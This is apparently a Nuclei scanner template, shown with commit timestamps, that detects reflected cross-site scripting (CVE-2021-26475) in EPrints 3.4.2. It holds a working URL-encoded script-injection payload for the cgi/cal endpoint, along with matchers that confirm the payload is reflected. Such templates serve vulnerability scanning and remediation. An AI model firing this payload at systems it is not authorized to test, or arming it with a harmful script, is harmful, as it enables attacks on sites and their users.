2021-07-19 13:34:21 +00:00
|
|
|
id: CVE-2021-26475
|
|
|
|
|
|
|
|
info:
|
2022-08-29 13:55:23 +00:00
|
|
|
name: EPrints 3.4.2 - Cross-Site Scripting
|
2021-07-19 13:34:21 +00:00
|
|
|
author: geeknik
|
|
|
|
severity: medium
|
2022-08-29 13:55:23 +00:00
|
|
|
description: EPrints 3.4.2 contains a reflected cross-site scripting vulnerability via the cgi/cal URI.
|
2023-09-06 12:09:01 +00:00
|
|
|
remediation: |
|
|
|
|
Apply the latest security patches or upgrade to a newer version of EPrints that addresses this vulnerability.
|
2022-04-22 10:38:41 +00:00
|
|
|
reference:
|
|
|
|
- https://github.com/grymer/CVE/blob/master/eprints_security_review.pdf
|
2022-05-17 09:18:12 +00:00
|
|
|
- https://files.eprints.org/2548/
|
2022-08-29 13:55:23 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-26475
|
2021-09-10 11:26:40 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
2022-04-22 10:38:41 +00:00
|
|
|
cvss-score: 6.1
|
2021-09-10 11:26:40 +00:00
|
|
|
cve-id: CVE-2021-26475
|
|
|
|
cwe-id: CWE-79
|
2023-10-14 11:27:55 +00:00
|
|
|
epss-score: 0.00175
|
2023-10-16 10:55:14 +00:00
|
|
|
epss-percentile: 0.54431
|
2023-09-06 12:09:01 +00:00
|
|
|
cpe: cpe:2.3:a:eprints:eprints:3.4.2:*:*:*:*:*:*:*
|
2023-04-28 08:11:21 +00:00
|
|
|
metadata:
|
|
|
|
max-request: 1
|
2023-07-11 19:49:27 +00:00
|
|
|
vendor: eprints
|
|
|
|
product: eprints
|
|
|
|
tags: cve,cve2021,xss,eprints,intrusive
|
2021-07-19 13:34:21 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2021-07-19 13:34:21 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/cgi/cal?year=2021%3C/title%3E%3Cscript%3Ealert(%27{{randstr}}%27)%3C/script%3E"
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
words:
|
2023-07-11 19:49:27 +00:00
|
|
|
- </title><script>alert('{{randstr}}')</script>
|
2022-07-05 03:38:54 +00:00
|
|
|
|
2021-07-19 13:34:21 +00:00
|
|
|
- type: word
|
|
|
|
part: header
|
|
|
|
words:
|
2023-07-11 19:49:27 +00:00
|
|
|
- text/html
|
2022-07-05 03:38:54 +00:00
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|